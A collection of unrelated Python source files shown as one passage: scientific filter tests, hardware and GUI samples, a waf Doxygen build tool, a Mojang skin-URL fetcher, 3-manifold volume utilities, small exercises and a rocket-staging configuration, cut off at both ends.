return np.exp(-((x - mu) / sigma)**2) / np.sqrt(sigma * 2 * np.pi)
temporal = gaussian(np.linspace(-3, 3, filter_length), -1, 1.5)
spatial = gaussian(np.linspace(-3, 3, nx * ny), 0, 1.0).reshape(nx, ny)
true_filter = np.outer(temporal, spatial.ravel())
noise_std = 0.01 * (temporal.max() - temporal.min())
true_filter += np.random.randn(*true_filter.shape) * noise_std
s, t = flt.decompose(true_filter)
# s/t are unit vectors, scale them and the inputs
s -= s.min()
s /= s.max()
t -= t.min()
t /= t.max()
temporal -= temporal.min()
temporal /= temporal.max()
spatial -= spatial.min()
spatial /= spatial.max()
tol = 0.1
assert np.allclose(temporal, t, atol=tol)
assert np.allclose(spatial.ravel(), s.ravel(), atol=tol)
def test_filterpeak():
"""Test finding the maximal point in a 3D filter"""
arr = np.zeros((5, 2, 2))
true_index = 7
arr.flat[true_index] = -1
true_indices = np.unravel_index(true_index, arr.shape)
idx, sidx, tidx = flt.filterpeak(arr)
assert true_index == idx
assert true_indices[0] == tidx
assert np.all(true_indices[1:] == sidx)
def test_cutout():
"""Test cutting out a small tube through a 3D spatiotemporal filter"""
np.random.seed(0)
chunk = np.random.randn(4, 2, 2)
arr = np.pad(chunk, ((0, 0), (1, 1), (1, 1)), 'constant', constant_values=0)
cutout = flt.cutout(arr, (2, 2), width=1)
assert np.allclose(cutout, chunk)
def test_cutout_peak():
"""Test that the `filtertools.cutout()` method correctly
uses the filter peak."""
chunk = np.zeros((4, 2, 2))
chunk[2, 1, 1] = 1
arr = np.pad(chunk, ((0, 0), (1, 1), (1, 1)),
'constant', constant_values=0)
cutout = flt.cutout(arr, width=1)
assert np.allclose(cutout, chunk)
def test_cutout_raises():
"""Test cutout() raises an exception when the index argument
does not have two elements."""
with pytest.raises(ValueError):
flt.cutout(np.zeros((10, 10, 10)), (1,))
def test_resample():
"""Test resampling a 1 or 2D array."""
size = 100
arr = np.random.randn(size)
scale = 10
up = flt.resample(arr, scale)
assert np.allclose(up[::scale], arr)
orig_power = np.absolute(np.fft.fft(arr))
up_power = np.absolute(np.fft.fft(arr))
assert np.allclose(orig_power[: int(size / 2)], up_power[: int(size / 2)])
arr = np.random.randn(size, size)
up = flt.resample(arr, scale)
assert np.allclose(up[::scale, ::scale], arr)
orig_power = np.absolute(np.fft.fft2(arr)) * scale**2
up_power = np.absolute(np.fft.fft2(up))
assert np.allclose(orig_power[:int(size / 2), :int(size / 2)],
up_power[:int(size / 2), :int(size / 2)])
def test_normalize_spatial():
"""Test normalizing a noisy filter."""
np.random.seed(0)
nx, ny = 10, 10
shape = (nx, ny)
true_filter = np.random.randn(*shape)
noise_std = 0.01
noisy_filter = true_filter + 1.0 * np.random.randn(*shape) * noise_std
normalized = flt.normalize_spatial(noisy_filter)
atol = 0.1
assert np.allclose(normalized, true_filter, atol=atol)
def test_rfsize():
np.random.seed(0)
nx, ny = 10, 10
from pyret.filtertools import _gaussian_function
x, y = np.meshgrid(np.linspace(-3, 3, nx), np.linspace(-3, 3, ny))
points = np.stack((x.ravel(), y.ravel()), axis=0)
true_filter = _gaussian_function(points, 0, 0, 1, 0, 1).reshape(nx, ny)
xsize, ysize = flt.rfsize(true_filter, 1., 1.)
assert np.allclose(xsize, 4, 0.1) # 2SDs on either side == RF size
assert np.allclose(ysize, 4., 0.1)
def test_linear_response_1d():
"""Test method for computing linear response from a
filter to a one-dimensional stimulus. The linear response of the
filter to an impulse should return the filter itself.
"""
filt = np.array(((1, 0, 0)))
stim = np.concatenate(((1,), np.zeros((10,))), axis=0)
pred = flt.linear_response(filt, stim) # Impulse response is linear filter
assert np.allclose(pred[:filt.size], filt)
assert np.allclose(pred[filt.size:], np.zeros_like(pred[filt.size:]))
def test_linear_response_acausal():
"""Test computing a linear response from a filter to a 1D stimulus,
including acausal portions of the stimulus. The linear response of
the filter to an impulse should return the filter itself, plus
zeros at any acausal time points.
"""
nacausal_points = 1
filt = np.concatenate((np.zeros((nacausal_points,)), (1, 0, 0)), axis=0)
stim = np.concatenate(((1,), np.zeros((10,))), axis=0)
pred = flt.linear_response(filt, stim, nacausal_points)
assert np.allclose(pred[:filt.size - nacausal_points],
filt[nacausal_points:])
assert np.allclose(pred[filt.size:], np.zeros_like(pred[filt.size:]))
def test_linear_response_only_acausal():
"""Test that calling ``linear_response`` with only acausal
points is invalid.
"""
with pytest.raises(ValueError):
flt.linear_response(np.zeros((3,)), np.zeros((10,)),
nsamples_after=3)
def test_linear_response_nd():
"""Test method for computing linear response from a
filter to a multi-dimensional stimulus. The linear response of
the filter to an impulse (1 at first time point in all spatial dimensions)
should return the filter itself, scaled by the number of spatial points.
"""
for ndim in range(2, 4):
filt = np.zeros((3,) + ((2,) * ndim))
filt[0] = 1.
stim = np.zeros((10,) + ((2,) * ndim))
stim[0] = 1.
pred = flt.linear_response(filt, stim)
assert np.allclose(pred[0], filt[0].sum())
assert np.allclose(pred[1:], np.zeros_like(pred[1:]))
def test_linear_response_raises():
"""Test raising ValueErrors with incorrect inputs"""
with pytest.raises(ValueError):
flt.linear_response(np.zeros((10,)), np.zeros((10,2)))
with pytest.raises(ValueError):
flt.linear_response(np.zeros((10, 2)), np.zeros((10, 3)))
def test_revcorr_raises():
"""Test raising ValueErrors with incorrect inputs"""
with pytest.raises(ValueError):
flt.revcorr(np.zeros((10, 1)), np.zeros((11,)), 2)[0]
with pytest.raises(ValueError):
flt.revcorr(np.zeros((10, 3)), np.zeros((10, 2)), 2)[0]
def test_revcorr_1d_ignores_beginning():
"""Verify revcorr ignores the first filter-length points of the stimulus,
to only consider those points which the response and stimulus overlap
completely.
"""
filt = np.array(((1, 0, 0)))
stim = np.concatenate(((1,), np.zeros((10,))), axis=0)
response = np.convolve(filt, stim, 'full')[:stim.size]
recovered, lags = flt.revcorr(stim, response, filt.size)
assert np.allclose(recovered, 0)
def test_revcorr_1d():
"""Test computation of 1D reverse correlation.
The reverse-correlation should recover the time-reverse of the
linear filter, and the lags should be start at negative values
and be strictly increasing.
"""
filt = np.array(((1, 0, 0)))
stim = np.zeros((10,))
stim[5] = 1
response = np.convolve(filt, stim, 'full')[:stim.size]
recovered, lags = flt.revcorr(stim, response, filt.size)
assert np.allclose(recovered, filt[::-1])
assert lags[0] == -(filt.size - 1)
assert (np.diff(lags) == 1).all()
def test_revcorr_acausal():
"""Test computation of a 1D linear filter by reverse correlation,
including acausal lag values. The reverse-correlation should recover
the time-reverse of the linear filter.
"""
filt = np.array(((1, 0, 0)))
stim = np.zeros((10,))
stim[5] = 1.0
response = np.convolve(filt, stim, 'full')[:stim.size]
nsamples_after = 2
recovered, lags = flt.revcorr(stim, response, filt.size, nsamples_after)
assert np.allclose(recovered[nsamples_after:], filt[::-1])
assert np.allclose(recovered[:filt.size], 0)
assert lags[0] == -(filt.size - 1)
assert lags[-1] == nsamples_after
assert (np.diff(lags) == 1).all()
def test_revcorr_nd():
"""Test computation of 3D linear filter by reverse correlation.
The reverse correlation should return the time-reverse of the
linear filter, scaled by the number of spatial points.
"""
ndim = 3
filt = np.zeros((3,) + ((2,) * ndim))
filt[0] = 1.
stim = np.zeros((10,) + ((2,) * ndim))
stim[5] = 1.
response = flt.linear_response(filt, stim)
recovered, lags = flt.revcorr(stim, response, filt.shape[0])
assert np.allclose(recovered[-1], filt[0].sum())
assert np.allclose(recovered[:-1], 0)
|
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from wired_module import *
# Generated By WiredQT for Python: by Rocky Nuarin, 2021 Phils
class Handler(QtWidgets.QWidget,usercontrol):
def __init__(self, *param):
super(Handler, self).__init__(None)
initUI(self,param,w=1366,h=768,title="WiredQT v1.0",controlbox=True,startpos=(0,30),timeoutdestroy=-1)
self.GTKForms()
self.timer=QtCore.QTimer()
self.timer.timeout.connect(self.loop)
self.timer.start(10)
self.sch=Scheduler(500)#500 ms
self.sch.Start()
|
#!/usr/bin/env python3
#This sample demonstrates detecting tilt without using the I2C bus.
#Install LoRa HAT library with "pip3 install turta-lorahat"
from time import sleep
from turta_lorahat import Turta_Accel
#Initialize
accel = Turta_Accel.AccelTiltSensor()
try:
while True:
#Read tilt states in one shot
tilt_xyz = accel.read_tilt_xyz()
#Print the readings
print("X-Tilt..........: " + ("Tilt detected." if tilt_xyz[0] else "No tilt."))
print("Y-Tilt..........: " + ("Tilt detected." if tilt_xyz[1] else "No tilt."))
print("Z-Tilt..........: " + ("Tilt detected." if tilt_xyz[2] else "No tilt."))
#Wait
print("-----")
sleep(0.5)
#Exit on CTRL+C
except KeyboardInterrupt:
print('Bye.')
|
# Copyright 2018 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ruamel.yaml import YAML
class Config:
yaml = YAML()
def __init__(self, path):
self.path = path
f = open(path, "r")
self.configs = self.yaml.load(f.read())
f.close()
def update_folders(self, folders):
self.configs['folders_list_cache'] = folders
print 'lets write'
with open(self.path, 'w') as yf:
self.yaml.dump(self.configs, stream=yf)
|
#! /usr/bin/env python
# encoding: UTF-8
# Thomas Nagy 2008-2010 (ita)
"""
Doxygen support
Variables passed to bld():
* doxyfile -- the Doxyfile to use
When using this tool, the wscript will look like:
def options(opt):
opt.load('doxygen')
def configure(conf):
conf.load('doxygen')
# check conf.env.DOXYGEN, if it is mandatory
def build(bld):
if bld.env.DOXYGEN:
bld(features="doxygen", doxyfile='Doxyfile', ...)
def doxygen(bld):
if bld.env.DOXYGEN:
bld(features="doxygen", doxyfile='Doxyfile', ...)
"""
from fnmatch import fnmatchcase
import os, os.path, re, stat
from waflib import Task, Utils, Node, Logs, Errors, Build
from waflib.TaskGen import feature
DOXY_STR = '"${DOXYGEN}" - '
DOXY_FMTS = 'html latex man rft xml'.split()
DOXY_FILE_PATTERNS = '*.' + ' *.'.join('''
c cc cxx cpp c++ java ii ixx ipp i++ inl h hh hxx hpp h++ idl odl cs php php3
inc m mm py f90c cc cxx cpp c++ java ii ixx ipp i++ inl h hh hxx
'''.split())
re_rl = re.compile('\\\\\r*\n', re.MULTILINE)
re_nl = re.compile('\r*\n', re.M)
def parse_doxy(txt):
tbl = {}
txt = re_rl.sub('', txt)
lines = re_nl.split(txt)
for x in lines:
x = x.strip()
if not x or x.startswith('#') or x.find('=') < 0:
continue
if x.find('+=') >= 0:
tmp = x.split('+=')
key = tmp[0].strip()
if key in tbl:
tbl[key] += ' ' + '+='.join(tmp[1:]).strip()
else:
tbl[key] = '+='.join(tmp[1:]).strip()
else:
tmp = x.split('=')
tbl[tmp[0].strip()] = '='.join(tmp[1:]).strip()
return tbl
class doxygen(Task.Task):
vars = ['DOXYGEN', 'DOXYFLAGS']
color = 'BLUE'
def runnable_status(self):
'''
self.pars are populated in runnable_status - because this function is being
run *before* both self.pars "consumers" - scan() and run()
set output_dir (node) for the output
'''
for x in self.run_after:
if not x.hasrun:
return Task.ASK_LATER
if not getattr(self, 'pars', None):
txt = self.inputs[0].read()
self.pars = parse_doxy(txt)
if not self.pars.get('OUTPUT_DIRECTORY'):
self.pars['OUTPUT_DIRECTORY'] = self.inputs[0].parent.get_bld().abspath()
# Override with any parameters passed to the task generator
if getattr(self.generator, 'pars', None):
for k, v in self.generator.pars.iteritems():
self.pars[k] = v
self.doxy_inputs = getattr(self, 'doxy_inputs', [])
if not self.pars.get('INPUT'):
self.doxy_inputs.append(self.inputs[0].parent)
else:
for i in self.pars.get('INPUT').split():
if os.path.isabs(i):
node = self.generator.bld.root.find_node(i)
else:
node = self.generator.path.find_node(i)
if not node:
self.generator.bld.fatal('Could not find the doxygen input %r' % i)
self.doxy_inputs.append(node)
if not getattr(self, 'output_dir', None):
bld = self.generator.bld
# First try to find an absolute path, then find or declare a relative path
self.output_dir = bld.root.find_dir(self.pars['OUTPUT_DIRECTORY'])
if not self.output_dir:
self.output_dir = bld.path.find_or_declare(self.pars['OUTPUT_DIRECTORY'])
self.signature()
return Task.Task.runnable_status(self)
def scan(self):
exclude_patterns = self.pars.get('EXCLUDE_PATTERNS','').split()
file_patterns = self.pars.get('FILE_PATTERNS','').split()
if not file_patterns:
file_patterns = DOXY_FILE_PATTERNS
if self.pars.get('RECURSIVE') == 'YES':
file_patterns = ["**/%s" % pattern for pattern in file_patterns]
nodes = []
names = []
for node in self.doxy_inputs:
if os.path.isdir(node.abspath()):
for m in node.ant_glob(incl=file_patterns, excl=exclude_patterns):
nodes.append(m)
else:
nodes.append(node)
return (nodes, names)
def run(self):
dct = self.pars.copy()
dct['INPUT'] = ' '.join(['"%s"' % x.abspath() for x in self.doxy_inputs])
code = '\n'.join(['%s = %s' % (x, dct[x]) for x in self.pars])
code = code.encode() # for python 3
#fmt = DOXY_STR % (self.inputs[0].parent.abspath())
cmd = Utils.subst_vars(DOXY_STR, self.env)
env = self.env.env or None
proc = Utils.subprocess.Popen(cmd, shell=True, stdin=Utils.subprocess.PIPE, env=env, cwd=self.generator.bld.path.get_bld().abspath())
proc.communicate(code)
return proc.returncode
def post_run(self):
nodes = self.output_dir.ant_glob('**/*', quiet=True)
for x in nodes:
x.sig = Utils.h_file(x.abspath())
self.outputs += nodes
return Task.Task.post_run(self)
class tar(Task.Task):
"quick tar creation"
run_str = '${TAR} ${TAROPTS} ${TGT} ${SRC}'
color = 'RED'
after = ['doxygen']
def runnable_status(self):
for x in getattr(self, 'input_tasks', []):
if not x.hasrun:
return Task.ASK_LATER
if not getattr(self, 'tar_done_adding', None):
# execute this only once
self.tar_done_adding = True
for x in getattr(self, 'input_tasks', []):
self.set_inputs(x.outputs)
if not self.inputs:
return Task.SKIP_ME
return Task.Task.runnable_status(self)
def __str__(self):
tgt_str = ' '.join([a.nice_path(self.env) for a in self.outputs])
return '%s: %s\n' % (self.__class__.__name__, tgt_str)
@feature('doxygen')
def process_doxy(self):
if not getattr(self, 'doxyfile', None):
self.generator.bld.fatal('no doxyfile??')
node = self.doxyfile
if not isinstance(node, Node.Node):
node = self.path.find_resource(node)
if not node:
raise ValueError('doxygen file not found')
# the task instance
dsk = self.create_task('doxygen', node)
if getattr(self, 'doxy_tar', None):
tsk = self.create_task('tar')
tsk.input_tasks = [dsk]
tsk.set_outputs(self.path.find_or_declare(self.doxy_tar))
if self.doxy_tar.endswith('bz2'):
tsk.env['TAROPTS'] = ['cjf']
elif self.doxy_tar.endswith('gz'):
tsk.env['TAROPTS'] = ['czf']
else:
tsk.env['TAROPTS'] = ['cf']
def configure(conf):
'''
Check if doxygen and tar commands are present in the system
If the commands are present, then conf.env.DOXYGEN and conf.env.TAR
variables will be set. Detection can be controlled by setting DOXYGEN and
TAR environmental variables.
'''
print('Doxygen documentation tools:')
conf.find_program('doxygen', var='DOXYGEN', mandatory=False)
conf.find_program('dot', var='dot', mandatory=True)
conf.find_program('tar', var='TAR', mandatory=False)
if Utils.unversioned_sys_platform()=='win32':
path_list = [os.path.join('C:', os.sep, 'Program Files', 'Git', 'usr', 'bin')]
Logs.debug('Did not find native tar, searching for git tar...')
conf.find_program('tar', var='TAR', path_list=path_list, mandatory=False)
# doxygen docs
from waflib.Build import BuildContext
class doxy(BuildContext):
__doc__ = '''creates doxygen documentation''' # foxbms
cmd = "doxygen"
fun = "doxygen"
|
from context import search
import unittest
class BasicTestSuite(unittest.TestCase):
global isf
global corpus
global corpus_complex
corpus = 'The quick brown fox jumped over the lazy dog'
corpus_complex = 'When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the earth, the separate and equal station to which the Laws of Nature and of Nature\'s God entitle them, a decent respect to the opinions of mankind requires that they should declare the causes which impel them to the separation'
isf = search.Search()
def test_searchSimple(self):
result = isf.searchSimple(corpus, 'brown')
self.assertTrue(result, True)
def test_forward_searchJoint(self):
result = isf.searchJoint(corpus_complex, 'decent', 'respect', '1', 5)
self.assertEqual(result, 5)
def test_twoway_searchJoint(self):
result = isf.searchJoint(corpus_complex, 'respect', 'decent', '2', 5)
if __name__ == '__main__':
unittest.main()
|
#作者 Github@layou233
#从原mcsg.js脚本重写
import base64, json, webbrowser
from urllib import request
def getUuid(playerName):
url="https://api.mojang.com/users/profiles/minecraft/"+playerName #Mojang API
return json.loads(request.urlopen(url).read().decode("utf-8"))["id"]
def getSkinUrl(uuid):
url="https://sessionserver.mojang.com/session/minecraft/profile/"+uuid #Mojang API
return json.loads(base64.b64decode(json.loads(request.urlopen(url).read().decode("utf-8"))["properties"][0]["value"]).decode("utf-8"))["textures"]["SKIN"]["url"]
if input('请选择模式(输入序号):\n1 - 通过游戏ID获取皮肤\n2 - 通过UUID获取皮肤\n') == "1":
q="游戏ID"
else:
q="UUID"
i=input('请输入'+q+'\n')
if q == "游戏ID":
sign=getUuid(i)
else:
sign=i
url=getSkinUrl(sign)
print(i,'的皮肤文件链接为',url)
input('\n使用 回车 在浏览器中打开')
webbrowser.open(url)
|
from snappy import Manifold
from cypari import *
from multiprocessing import *
import copy
import sys
from ManifoldIterators import *
from VolumeUtilities import *
def prepare_pvolume_file(maniter, ofilenm, append = False, engine = 'magma', max_secs = 20, sln = 2, retrieve = True, period = 100, separator = ';'):
"""The same as calling get_volume_data(mans).write_to_csv(ofilenm) with the given parameters,
except output will be written out every period manifolds and logs generated, instead of all at once."""
ctr = 0
block = list()
done = False
try:
if append:
f = open(ofilenm,'a')
else:
f = open(ofilenm,'w')
while True:
try:
block.append(maniter.next())
ctr += 1
except StopIteration:
done = True
if ctr == period or done:
print 'Processing '+str(block[0])+' to '+str(block[-1])+'.'
v = get_volume_data(ForwardingIterator(block.__iter__(),lambda m : str(m)),engine=engine,max_secs=max_secs,sln=sln,retrieve=retrieve)
v.write_to_csv(f,append=append,separator=separator)
append = True # we must be appending after the first time
ctr = 0
block = list()
if done:
break
finally:
f.close()
# Count the number of distinct non-zero (<EPSILON) values up to sign
def _distinct_abs(vol_list, epsilon = EPSILON):
pos = set([abs(pari(v)) for v in vol_list if v >= epsilon]) # remove nonpositive volumes (as distinct is up to sign)
good = list()
for v in pos:
matches = [u for u in good if abs(v-u) <= epsilon]
if not matches:
good.append(v)
return len(good)
def get_volume_data(man_nms, engine = 'magma', max_secs = 20, retrieve = True, sln = 2, max_itf_degree = MAX_ITF):
""" Returns a VolumeData object containing exotic volumes for manifolds with the given names
Volumes' precision is based on pari, so set it there
set retrieve = False to skip retrieving ptolemy data from files
set engine = None to skip computing ptolemy data in an engine
set max_secs to specify how long we will spend computing a given manifolds' data before killing the engine and moving on;
specifying None means we will never give up (unless something crashes)
if the engine given crashes, so will IDLE and SnapPy; to avoid this, run this command only from within python scripts.
Manifolds with more than floor(max_itf_degree/2) distinct volumes to an obstruction class
will have their data for that obstruction class removed, since this demonstrates an invariant trace field with too high ncp
Set to None and it will be ignored."""
#TODO: special case max_secs=None to not bother with processes
if engine:
def _use_engine(v,p): # this function will be called in a second process to facilitate time limits
p.send(v.compute_solutions(engine = engine))
recs = dict()
for nm in man_nms:
try:
sols = None
var = Manifold(nm).ptolemy_variety(sln,'all')
try:
if retrieve:
sols = var.retrieve_decomposition()
else:
raise Exception("Go on and compute")
except Exception as e: # try using engine
if engine:
mine, theirs = Pipe(duplex = False)
p = Process(target=_use_engine,args=[var,theirs])
p.daemon = True
p.start()
if mine.poll(max_secs): # Here is the time limit stuff
sols = mine.recv()
p.terminate()
else:
p.terminate() # give up on this one
print 'Computation took too long; skipping '+nm
continue
else:
print 'No engine and no data retrieved; skipping '+nm
continue
if sols:
data = [(c.number_field(),c.solutions(numerical = True).volume_numerical()) for c in sols.flatten()]
for cl_idx in xrange(len(data)):
if data[cl_idx]: # TODO may be trivial since no check here
for v in data[cl_idx][1]:
recs.setdefault(str(data[cl_idx][0]),dict()).setdefault(str(v),list()).append((nm,cl_idx))
else:
print 'Got no solutions; skipping '+nm
except Exception as e:
print(str(e))+'; skipping '+nm
continue
for p in recs.keys():
for v in recs[p].keys():
recs[p][v] = list(set(recs[p][v]))
return VolumeData(data = recs)
def get_potential_trace_fields(poly,sln=2):
"""Given a minimal polynomial of a trace field, returns a list of minimal polynomials of the potential invariant trace fields."""
pol = pari(poly)
try:
return [str(rec[0].polredabs()) for rec in pol.nfsubfields()[1:] if _knmiss(rec[0].poldegree(),pol.poldegree(),sln=sln)] # poldegree returns int
except: # we want cypari.gen.PariError, but no idea how to reference; fortunately, anything else will just raise again
try:
pol = pol.polredabs()
except: # actually except PariError again
print 'When running trace field '+poly+' polredabs couldn\'t handle it.'
return [poly] # between this return and the above print statement, we should know when the above error happened.
return get_potential_trace_fields(str(pol),sln=sln)
def is_pitf(poly,cand,sln):
pol = pari(poly)
cand = pari(cand)
small = cand.poldegree()
large = pol.poldegree()
return _knmiss(small,large,sln)
def _knmiss(s,l,n):
if s <= 0 or l <= 0 or n <= 0:
return False
while s < l:
s *= n
return s == l
# Wrapper for manipulating data on pseudo-volumes
class VolumeData:
"""This class is for storage and manipulation of exotic volumes of some manifolds.
Given a value for data, the constructor makes a VolumeData object wrapping it.
The datastructure is {poly:{volume:(manifold,obstruction_class_index)}}
It's usually not nescecary to make these yourself; collection and read methods return them for you."""
# structure: dict poly ---> dict volume ---> [(manifold,obstr_cl)]
def __init__(self, data = dict()):
self.data = data
def get_polys(self):
"""Returns (as a list of strings) the minimal polynomials of the ptolemy/trace fields for the volumes in this object."""
return self.data.keys()
def get_volumes(self,poly):
"""Returns (as a list of strings) the volumes that occur over the field with the given minimal polynomial."""
return self.data[poly].keys()
def get_manifolds(self,poly,volume):
"""Returns a list of the names of manifolds that produce the given minimal polynomial/volume pair."""
return [p[0] for p in self.data[poly][volume]]
def combine_with(self,other):
"""Returns a VolumeData object containing the data from self and other; in case of a conflict (which should not occur),
the other's data takes precedence."""
new_data = copy.deepcopy(self.data)
for p in other.get_polys():
for v in other.get_volumes(p):
new_data.setdefault(p,dict()).setdefault(v,list()).extend(other.data[p][v])
return VolumeData(data = new_data)
# given an (open, ready to write) file object or valid filename, writes the data
def write_to_csv(self, output_file, separator = ';', append = False):
"""Writes out the data to output_file, provided output_file is a valid (open, ready to write) File object or filename."""
f = None
try:
if type(output_file) == str:
if append:
f = open(output_file,'a')
else:
f = open(output_file,'w')
else:
f = output_file
if not append:
f.write('"TraceField"'+separator+'"Volume"'+separator+'"Manifold"'+separator+'"ObstructionClass"'+'\n')
for p in self.get_polys():
for v in self.get_volumes(p):
for rec in self.data[p][v]:
f.write('"'+p+'"'+separator)
f.write('"'+v+'"'+separator)
f.write('"'+rec[0]+'"'+separator)
f.write('"'+str(rec[1])+'"\n')
finally:
if type(output_file) == str and f:
f.close()
def filter_fields(self, maxsfdegree=MAX_ITF, sln = 2):
"""This filter removes some polynomials with no subfields of degree <= maxsfdegree
it doesn't get them all, but does avoid calling nfsubfields; it is quick and approximate."""
def _filter(p): # for a double break
deg = pari(p).poldegree()
for n in xrange(maxsfdegree):
if _knmiss(n+1, deg, sln):
return
del self.data[p]
for p in self.data.keys():
_filter(p)
# Remove all volumes that are integral multiples of another volume (including 1*)
# To register as an integral multiple, the decimal part of big/small must be less than epsilon
# Will remove manifolds if all their pvols were integral multiples of other pvols
def cull_volumes(self, epsilon = EPSILON): # code adapted from VolumeProcessing
for poly in self.get_polys():
vols = self.get_volumes(poly)
i = 0
while i < len(vols) - 1:
j = i + 1
while j < len(vols):
try:
if is_int(float(vols[i])/float(vols[j]), epsilon = epsilon) and gen.pari(vols[i] + ' > ' + vols[j]) == 1:
# We have to throw away (culled) manifold names to let all culled manifolds have the same volume
# [j] divides [i] so remove [i]
del self.data[poly][vols.pop(i)]
# i is already effectivley incremented, so we must offset it
i = i-1
break
elif is_int(float(vols[j])/float(vols[i]), epsilon = epsilon):
# this time, remove [j]
del self.data[poly][vols.pop(i)]
# j is effectivley incremented, no need to do it
else:
j += 1
except (ValueError, ZeroDivisionError): # bad quotient; not a linear combination either way so...
j += 1
i += 1
def remove_nonpositive_vols(self, epsilon = EPSILON):
"""Removes any volume less than epsilon"""
for p in self.get_polys():
for v in self.get_volumes(p):
try:
if float(v) < epsilon:
del self.data[p][v]
except: # v was really close to 0
del self.data[p][v]
def filter_distinct_volumes(self, maxsfdegree = MAX_ITF, epsilon = EPSILON):
"""Removes an obstruction class if there are more than floor(maxsfdegree/2) distinct (up to sign) nonzero volumes.
If this condition is met, it means that the invariant trace fields have more than maxsfdegree,
because they have more complex places than that degree could possibly have."""
# This sucks, because we have to get everything by manifold,oc pairs again.
classes = dict() # (m,oc):[(poly,vol)]
ncp = maxsfdegree/2
for p in self.get_polys():
for v in self.get_volumes(p):
for rec in self.data[p][v]:
classes.setdefault(rec,list()).append((p,v))
for rec,l in classes.items():
if _distinct_abs([p[1] for p in l], epsilon = epsilon) > ncp: # too many distinct volumes
for p,v in classes[rec]:
self.data[p][v].remove(rec)
def clean(self, maxsfdegree = MAX_ITF, epsilon = EPSILON, n=2):
"""Runs several methods for decreasing size without losing much information
Set maxsfdegree to None to avoid culling based on subfield degree."""
if maxsfdegree:
self.filter_fields(maxsfdegree = maxsfdegree, sln = n)
self.filter_distinct_volumes(maxsfdegree = maxsfdegree, epsilon = epsilon)
self.remove_nonpositive_vols(epsilon = epsilon)
# Cut down to 1 manifold per poly,vol pair.
def remove_duplicate_manifolds(self):
for p in self.get_polys():
for v in self.get_volumes(p):
self.data[p][v] = [self.data[p][v][0]]
def is_int(fl, epsilon = EPSILON):
return fl % 1 < epsilon or 1 - (fl % 1) < epsilon
def read_volumedata_csv(infile, separator = ';'):
"""Given an (open, ready to read data) file object or valid filename, reads the file and returns a VolumeData that would write it."""
f = None
try:
if type(infile) == str:
f = open(infile,'r')
f.readline()
else:
f = infile
data = dict()
for l in f.readlines():
w = l.strip('\n').replace('"','').split(separator)
try:
data.setdefault(w[0],dict()).setdefault(w[1],list()).append((w[2],int(w[3])))
except IndexError: # This was initially for debugging, but it can be useful if you grabbed a file while a line was being written
print 'Malformed Input: '+str(w)
continue
return VolumeData(data = data)
finally:
if type(infile) == str and f:
f.close()
|
maior = None
menor = None
cont = 0
while True:
entr = input('Digite algum número, ou fim para finalizar: ')
if entr == 'fim': break
try:
int(entr)
except:
print('Erro de entrada')
continue #retorna ao começo do input
if menor is None:
menor = entr
elif maior is None:
maior = entr
elif entr >= maior:
maior = entr
elif entr <= menor:
menor = entr
cont += 1
if cont == 2:
print(f'O maior número é {menor}.')
print(f'O menor número é {maior}.')
elif cont != 2:
print(f'O maior número é {maior}.')
print(f'O menor número é {menor}.')
|
from collections import OrderedDict
jobfile="source/job.txt"
liquiddatafile="source/liquiddata.csv"
soliddatafile="source/soliddata.csv"
postprocfile="source/postproc.txt"
###ROCKETS SETTINGS
rockets=OrderedDict({
"Ariane 5 ECA":[
{
'name':"Core stage",
'index':0,
'qty':1,
'type':'liquid',
'tStart':0,
'tEnd':540,
'zStart':0,
'zEnd':157.7e3,
},
{
'name':"Boosters",
'index':0,
'qty':2,
'type':'solid',
'tStart':0,
'tEnd':140,
'zStart':0,
'zEnd':66.7e3,
},
{
'name':"Second stage",
'index':1,
'qty':1,
'type':'liquid',
'tStart':540,
'tEnd':1485,
'zStart':157.7e3,
'zEnd':250e3,
},
],
"Falcon Heavy":[
{
'name':"Core Stage",
'index':2,
'qty':9,
'type':'liquid',
'tStart':0,
'tEnd':282,
'zStart':0,
'zEnd':92e3,
},
{
'name':"Boosters",
'index':2,
'qty':18,
'type':'liquid',
'tStart':0,
'tEnd':162,
'zStart':0,
'zEnd':62e3,
},
{
'name':"Second Stage",
'index':3,
'qty':1,
'type':'liquid',
'tStart':282,
'tEnd':679,
'zStart':92e3,
'zEnd':250e3,
},
],
"Saturn V":[
{
'name':"1st Stage",
'index':4,
'qty':5,
'type':'liquid',
'tStart':0,
'tEnd':150.7,
'zStart':0,
'zEnd':65e3,
},
{
'name':"2nd Stage",
'index':5,
'qty':5,
'type':'liquid',
'tStart':150.7,
'tEnd':517.7,
'zStart':65e3,
'zEnd':175e3,
},
{
'name':"3rd Stage - 1st burn",
'index':6,
'qty':1,
'type':'liquid',
'tStart':517.7,
'tEnd':673.7,
'zStart':175e3,
'zEnd':185e3,
},
{
'name':"3rd Stage - 2nd burn",
'index':6,
'qty':1,
'type':'liquid',
'tStart':673.7,
'tEnd':1009.7,
'zStart':185e3,
'zEnd':250e3,
},
],
})
|
class Solution(object):
def XXX(self, n):
"""
:type n: int
:rtype: str
"""
a = '1'
for i in range(1,n):
a = a.replace('111', 'a')
a = a.replace('222', 'b')
a = a.replace('333', 'c')
a = a.replace('11', 'd')
a = a.replace('22', 'e')
a = a.replace('33', 'f')
a = a.replace('1', 'g')
a = a.replace('2', 'h')
a = a.replace('3', 'i')
a = a.replace('a', '31')
a = a.replace('b', '32')
a = a.replace('c', '33')
a = a.replace('d', '21')
a = a.replace('e', '22')
a = a.replace('f', '23')
a = a.replace('g', '11')
a = a.replace('h', '12')
a = a.replace('i', '13')
return a
|
from utils.reporter import runtimeError as _RuntimeError
from utils.tokens import Token as _Token
from utils.tokens import TokenType as _TokenType
from utils.misc import isValNeg as _isValNeg
from native.datastructs.rocketClass import RocketCallable as _RocketCallable
from native.datastructs.rocketClass import RocketInstance as _RocketInstance
from native.datatypes import rocketBoolean as _boolean
from native.datatypes import rocketNumber as _number
class List(_RocketCallable):
def __init__(self):
self.callee = 'List'
self.nature = 'native'
def arity(self):
return 1
def call(self, obj, args):
nin_lexeme = obj.KSL[1][_TokenType.NIN.value]
return RocketList(args, nin_lexeme)
def __repr__(self):
